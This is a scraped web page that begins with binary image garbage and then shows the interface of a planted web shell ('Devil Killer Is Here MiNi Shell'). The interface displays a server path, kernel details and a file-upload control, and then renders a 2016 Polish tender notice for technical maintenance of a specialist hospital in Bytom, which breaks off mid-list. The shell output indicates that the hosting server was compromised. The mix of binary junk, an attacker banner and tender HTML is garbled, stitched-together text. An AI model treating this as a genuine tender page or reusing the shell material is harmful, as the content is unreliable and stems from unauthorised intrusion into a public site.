JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/16260-N-2016.html

<p class="kh_header"><b>Bytom: Kompleksowa obsługę techniczną polegającą na całodobowej ciągłości bezpiecznego użytkowania urządzeń, instalacji i systemów w obiektach Szpitala Specjalistycznego nr 1 w Bytomiu. Techniczne utrzymanie ruchu Szpitala w zakresie robót ogólnobudowlanych, ślusarskich i instalacyjnych: wodno - kanalizacyjnych, co., elektrycznych oraz obsługi technicznej gazów medycznych.</b><br>
<b>Numer ogłoszenia: 16260 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 1 , ul. Żeromskiego 7, 41-902 Bytom, woj. śląskie, tel. 032 3963266, 3863332, faks 032 2816765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital1.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługę techniczną polegającą na całodobowej ciągłości bezpiecznego użytkowania urządzeń, instalacji i systemów w obiektach Szpitala Specjalistycznego nr 1 w Bytomiu. Techniczne utrzymanie ruchu Szpitala w zakresie robót ogólnobudowlanych, ślusarskich i instalacyjnych: wodno - kanalizacyjnych, co., elektrycznych oraz obsługi technicznej gazów medycznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje 
Kompleksową obsługę techniczną polegającą na całodobowej ciągłości bezpiecznego użytkowania urządzeń, instalacji i systemów w obiektach Szpitala Specjalistycznego nr 1 w Bytomiu. Techniczne utrzymanie ruchu szpitala w zakresie robót ogólnobudowlanych, ślusarskich i instalacyjnych: wodno - kanalizacyjnych, co., elektrycznych oraz obsługi technicznej gazów medycznych.

Wymagania ogólne:
1.	Sposób wykonania usługi, jak również zastosowane w związku z nim technologie
i rozwiązania organizacyjne muszą spełniać wszystkie wymogi wynikające z przepisów prawa powszechnie obowiązującego i odpowiednich regulacji branżowych w tym w szczególności przepisów obowiązujących w zakładach opieki zdrowotnej.
2. Wykonawca bierze odpowiedzialność za prawidłowe funkcjonowanie infrastruktury technicznej Szpitala po wykonaniu zleceń.
3. W razie zaistnienia sytuacji nadzwyczajnych Wykonawca zapewni Zamawiającemu wszelką pomoc 
w celu zapewnienia ciągłości funkcjonowania Szpitala.
4. Zapewnienie ciągłości dostaw mediów na terenie Szpitala (energia elektryczna, woda zimna, ciepła woda użytkowa, gazy medyczne, ciepło). Koszty mediów m in. energii elektrycznej, wody i ścieków, ciepła dla co. i c.w.u. pokrywa Zamawiający.
5. Całodobową obsługę wszystkich urządzeń i systemów służących do dystrybucji i poboru wyżej wymienionych mediów.
6.Prowadzenie serwisu technicznego infrastruktury technicznej Szpitala.
7. Sporządzanie orzeczeń technicznych niesprawnych i nie nadających się do dalszej eksploatacji urządzeń i systemów będących własnością Szpitala w porozumieniu i na wniosek własny lub Szpitala.
8. Wykonywanie innych zadań związanych z obsługą infrastruktury technicznej, po uzgodnieniu ich zakresu z Zamawiającym.

Wymagania szczegółowe dla poszczególnych branż:
W szczególności prace wykonywane na zlecenie (pisemne) pracownika Działu Organizacji 
i Infrastruktury:
Branża remontowo- budowlana:
1.	Drobne roboty budowlane: murarskie, tynkarskie, posadzkarskie po robotach instalacyjnych.
2.	Wykonywanie drobnych prac malarskich.
3.	Wykonywanie robót ślusarskich.
4.	Naprawy stolarskie w zakresie wymiany zamków, naprawy mebli itp.
5.	Wykonywanie prac ślusarskich (m.in. montaż dodatkowych zamków drzwi i szafek, wymianę zamków w drzwiach, wykonanie i montaż narożników z blach zabezpieczających futryny, drzwi
 i ściany, skręcanie i rozkręcanie regałów, demontaż i montaż elementów stropów podwieszanych, dorabianie kluczy wymiana uszkodzonych zawiasów);
6.	Wykonywanie prac budowlanych (m.in. wykonywanie otworów w ścianach
działowych do przejść i montażu drzwi oraz otworów kontrolnych; flizowanie
fragmentów ścian i posadzek; uzupełnienie ubytków tynków, flizowanie terakoty,
posadzek z płytek PCV i wykładzin rulonowych, gładzie, malowanie powierzchni
ścian, sufitów, stolarki drzwiowej i okiennej, wykonywanie wylewek, układanie
linoleum, płytek podłogowych, wykładzin dywanowych, naprawa uszkodzonych
tapet, wykładanie folii samoprzylepnych, montaż małych ścianek działowych,
przegród, przepierzeń, fugowanie i silikonowanie białego montażu, wymiana
uszkodzonych szyb w stolarce okiennej i drzwiowej, naprawa rolet okiennych,
naprawa stolarki drzwiowej i okiennej, naprawa elementów budowlanych małej
architektury jak murki schodów, pochylni dla osób niepełnosprawnych, kominki
wentylacyjne, wymiana zniszczonych kasetonów).



Branża elektryczna:
1.	Właściwe utrzymanie stanu technicznego instalacji elektrycznej, przyłączy, tablic rozdzielczych 
w obiektach Szpitala, oświetlenia awaryjno - ewakuacyjnego, oświetlenia zewnętrznego - przeglądy i konserwacje udokumentowane.
2.	Konserwacja i naprawy podległych urządzeń elektroenergetycznych i elektrycznych;
3.	Konserwacja, naprawa i modernizacja instalacji elektrycznych w obiektach Szpitala;
4.	Konserwacja i zabezpieczenie oświetlenia wewnętrznego.
5.	Konserwacja i zabezpieczenie oświetlenia zewnętrznego obiektów, placów, dróg wewnątrzszpitalnych.
6.	Wymiana uszkodzonego osprzętu elektrycznego, jak wyłączniki, przełączniki instalacyjne, gniazda wtyczkowe, przyciski sterownicze, puszki instalacyjne, żarówki, świetlówki etc;
7.	Wymiana bezpieczników topikowych, mocy samoczynnych, termicznych etc.

Instalacja sanitarna:
1.	Wykonanie okresowych przeglądów instalacji sanitarnej.
2.	Naprawa i wymiana uszczelek w zaworach przelotowych i czerpalnych i uszczelnianie dławic zaworów.
3.	Naprawa i wymiana uszkodzonych umywalek oraz elementów armatury (zaworów, wylewek, pokręteł, głowic, itp.).
4.	Naprawa i wymiana uszkodzonych zaworów kołnierzowych.
5.	Naprawa i wymiana uszkodzonych odcinków rur.
6.	Sprawdzanie drożności kratek odpływowych na zewnętrznym terenie wokół Szpitala i zgłaszanie konieczności ich ewentualnego udrożnienia, wraz z uzupełnieniem brakujących lub uszkodzonych kratek, pokryw rewizyjnych, itp. oraz czyszczenie kratek ściekowych.
7.	Usuwanie awarii wynikłych z nieszczelności hydraulicznych lub korozji.
8.	Sprawdzanie drożności pionów kanalizacyjnych i usuwanie stwierdzonych lub zgłoszonych niedrożności.
9.	Wymiana w razie potrzeby uszkodzonej armatury sanitarnej, tj. misek klozetowych, zbiorników płuczących, kratek ściekowych, osadników itp.
10.	Konserwacja oczyszczalni ścieków przy Al. Legionów 49.
11.	Wykonanie podłączeń nowo zakupionego sprzętu i urządzeń do instalacji wodno?kanalizacyjnej, co.
12.	Udział i nadzór w zakresie przegrzewania instalacji c.w.u. celem usunięcia bakterii Legionella.
13.	Sprawdzenie i usuwanie przyczyn zalewania pomieszczeń.
14.	Czyszczenie pionów kanalizacyjnych wraz z poziomami do pierwszej studni rewizyjnej.
15.	Wymiana uszkodzonej instalacji wodno - kanalizacyjnej.
16.	Wymiana uszkodzonych urządzeń sanitarnych (miski ustępowe, pisuary, umywalki, baterie, spłuczki itp.).
17.	Całodobowa obsługa systemów kanalizacji wewnętrznej, burzowej i ogólnospławnej wewnątrz Szpitala i zapewnienie jej pełnej drożności.
18.	Kontrola i zarządzanie ilością zużywanej wody w sposób dający wymierne efekty oszczędnościowe.

Instalacja centralnego ogrzewania wraz z węzłem cieplnym.

1.	Regulacja armatury i jej czyszczenie (zawory zwrotne, zawory bezpieczeństwa, wraz z uszczelnianiem armatury i wymianą uszczelek, główek zaworów, dławic itp.)
2.	Okresowe - na zlecenie- sprawdzanie prawidłowości wskazań i ewentualna wymiana uszkodzonych urządzeń pomiarowych (termometry, manometry).
3.	Bieżąca kontrola prawidłowości działania pomp obiegowych.
4.	Sprawdzanie i uzupełnianie w zładach instalacji co. poziomu wody wg bieżących potrzeb i stanu instalacji co.
5.	Uruchamianie nie grzejących grzejników.
6.	Odpowietrzanie grzejników przed okresem grzewczym z uszczelnianiem zaworów płukaniem grzejników, itp.
7.	Odpowietrzanie i regulacja instalacji co.
8.	Sprawdzanie i regulacja zaworów termoregulacyjnych.
9.	Systematyczne kontrolowanie pracy węzła co.
10.	 Likwidacja przecieków odpowietrzników miejscowych z ewentualną ich wymianą i likwidacja zapowietrzenia instalacji.
11.	Usuwanie przecieków w instalacji i odbiornikach co. z uszczelnianiem dławic zaworów grzejnikowych lub ich wymianą.
12.	Sprawdzanie prawidłowości działania zaworów na pionach z ewentualną ich wymianą.
13.	Wymiana uszkodzonych rur.
14.	Przegląd instalacji cw.u i co.
15.	Przegląd instalacji co. przed rozpoczęciem sezonu grzewczego - wykonanie wszystkich niezbędnych prac remontowych i konserwacyjnych przed rozpoczęciem sezonu grzewczego.
16.	Przegląd instalacji co. po zakończeniu sezonu grzewczego, sporządzenie odpowiednich raportów o stanie instalacji po sezonie grzewczym.
17.	Wymiana uszkodzonych grzejników co. wraz z robotami towarzyszącymi.
18.	Płukanie grzejników wg potrzeb wraz z ich demontażem i montażem, spuszczenia wody ze zładu i ponowne jego napełnienie.
19.	Współpraca z PEC Bytom w zakresie co. i cw.u.

Instalacja gazów medycznych, produktów medycznych i gazów technicznych.
1.	Utrzymanie instalacji łącznie z punktami poboru w należytej sprawności technicznej.
2.	Wymiana butli w rozprężalni wraz z przygotowaniem butli do wymiany.
3.	Dostawa i montaż butli na podstawie zamówień z jednostek organizacyjnych Szpitala.
4.	Całodobowy stały nadzór w rozprężalni oraz na oddziałach po otrzymaniu powiadomienia od odpowiednich służb co do konieczności ich wymiany.
5.	Całodobowe utrzymanie dostawy gazów medycznych i produktów technicznych.
6.	Bezwzględne przestrzeganie zasad postępowania podczas transportu i rozładunku butli.
7.	Kontrolowanie tablic rozdzielczych gazów medycznych a w przypadku stwierdzenia jakichkolwiek nieprawidłowości natychmiastowe powiadomienie Kierownika Działu Organizacji i Infrastruktury.
8.	Dbanie o czystość i porządek w magazynie gazów medycznych oraz rozprężalni tlenu i sprężonego powietrza.
9.	Zabrania się samowolnego dokonywania jakichkolwiek napraw zaworów, reduktorów oraz instalacji gazów medycznych.
10.	Odpowiedzialność finansowa za butle tlenowe przechowywane w magazynie podręcznym butli tlenowych na terenie szpitala /prawidłowe przechowywanie butli zgodnie z zaleceniami p.poż. oraz insp. pracy ponosi Wykonawca.
11.	Bezwzględne przestrzeganie terminowego dostarczania butli tlenowych z magazynu na oddziały szpitalne.
12.	Transport, wewnętrzny i dystrybucja butli z gazami medycznymi i produktami technicznymi na oddziały szpitalne wraz z podłączeniem do aparatury medycznej;
13.	Kontrolowanie szczelności punktów poboru gazów medycznych;
14.	Obsługa rozprężalni gazów medycznych.
15.	Prowadzenie kart pracy w zakresie dostaw gazów medycznych i produktów technicznych wraz z ich zamawianiem.

Zasady pracy pracowników technicznych wykonawcy na terenie Szpitala.
1.	Zgłoszenia awarii z oddziałów będą przekazywane do Działu Organizacji i Infrastruktury
od 7 do 15, a w godzinach od 16 do 8 rano następnego dnia oraz w dni wolne od pracy na
             portiernię lub bezpośrednio do osoby wyznaczonej przez Wykonawcę.
2.	Przy każdej awarii wystawione zostanie pisemne zlecenie, do którego zostanie wpisana awaria i czynności przy jej usuwaniu, a fakt jej usunięcia potwierdzony przez osobę uprawnioną, tj. pielęgniarkę oddziałową albo lekarza dyżurnego lub innego przedstawiciela zamawiającego.
3.	Naprawy bieżące wykonywane będą tak, aby nie zakłócać pracy Szpitala.
4.	Czas zgłoszenia się konserwatora do usunięcia awarii nie może być dłuższy niż 15 minut od momentu otrzymania zawiadomienia o awarii.
5.	Wykonawca uzgodni z zamawiającym jeden numer telefoniczny jako numer do kontaktu.
6.	Wykonawca jest odpowiedzialny za utrzymywanie czystości i porządku po wykonaniu zlecenia oraz przestrzeganie przez konserwatorów przepisów BHP i ppoż. oraz regulaminu porządkowego Szpitala.
7.	Wykonawca odpowiada za szkody wyrządzone przez niego przy wykonywaniu prac konserwacyjnych w stosunku do zamawiającego oraz osób trzecich.
8.	Wykonawca ma obowiązek zabezpieczyć miejsce awarii przed dostępem osób trzecich i niezwłocznie przystąpić do jej usuwania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.33.00.00-9, 45.33.11.00-7, 45.33.20.00-3, 45.33.24.00-7, 45.31.00.00-3, 45.44.21.00-8, 98.39.50.00-8, 45.21.13.50-7, 24.11.15.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca ubiegający się o udzielenie nin. zamówienia winien wnieść wadium w wysokości 
4 800,00zł (słownie: cztery tysiące osiemset złotych 00/100). 
2.	Wadium może być wniesione w jednej lub kilku następujących formach: 
a) pieniądzu, 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) gwarancjach bankowych, 
d) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U nr 109, poz. 1158 ze zm.). 
3. Wadium wnoszone w pieniądzu należy wpłacić na konto 80 1050 1230 1000 0023 5039 0999 
ING Bank Śląski S.A Odział w Bytomiu, z umieszczeniem na dowodzie wpłaty hasła: Wadium - obsługa techniczna ZP/PN/03/2016
4. Wadium wnoszone w pozostałych formach należy złożyć (oryginał) Zamawiającemu -  Szpital Specjalistyczny nr 1 ul. Żeromskiego 7, 41-902 Bytom, Zamówienia Publiczne (blok III, piętro IV, pok.3). 
5. Wadium wnosi się przed upływem terminu składania ofert. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na ww. rachunek bankowy Zamawiającego.
6. Wadium wnoszone w formie gwarancji lub poręczenia winno:
- być wystawione na Szpital Specjalistyczny Nr 1, ul. Żeromskiego 7, 41-902 Bytom
- zawierać w swej treści oświadczenie bezwarunkowego zobowiązania gwaranta (poręczyciela) do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą. Gwarancja (poręczenie) nie może zawierać zastrzeżenia gwaranta (poręczyciela), że pisemne żądanie zapłaty musi być przedstawione za pośrednictwem banku prowadzącego rachunek zamawiającego, w celu potwierdzenia, że podpisy złożone na pisemnym żądaniu należą do osób uprawnionych do zaciągania zobowiązań majątkowych w imieniu zamawiającego. 
- mieć okres ważności nie krótszy niż okres związania ofertą
- zawierać informację, jakiego postępowania o udzielenie zamówienia publicznego dotyczy (tytuł postępowania, numer sprawy)
- Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).

Do gwarancji (poręczenia) należy dołączyć na piśmie dokumenty, z których wynika stosowne upoważnienie (upełnomocnienie) w postaci oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu gwaranta (poręczyciela) bądź uwierzytelnioną przez notariusza. 

7. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym i zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Wadium wniesione przez jednego z wykonawców wspólnie ubiegających się o zamówienie uważa się za wniesione prawidłowo. 
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 12.2. 
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
12. Zatrzymanie wadium: 
12.1. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
12.2. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
13 Inne postanowienia dotyczące wadium: 
13.1. Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który nie wniósł wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy, albo nie zgodził się na przedłużenie okresu związania ofertą. Jednocześnie ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 
13.2. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 4.1 nn. rozdziału, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 

Wadium winno zabezpieczać cały 30 -dniowy okres związania ofertą, za początek którego uważa się dzień, w którym upłynął termin do składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do specyfikacji);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający uzna, że Wykonawca posiada odpowiednią wiedzę i doświadczenie, jeżeli wykaże, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówienia o podobnym charakterze co do przedmiotu jak i wartości zamówienia, tj. wykonał co najmniej dwie roboty budowlane obejmujące swym zakresem roboty instalacyjne: wodno - kanalizacyjnych C.O. wraz z drobnymi robotami ogólnobudowlanymi o wartości minimum 20 000 zł brutto każda i  przedłoży dokument (-ty) potwierdzający (-ce), że robota (-ty)  te została (-y) wykonana (-e) zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona (-e).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do specyfikacji);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do specyfikacji);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do specyfikacji);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

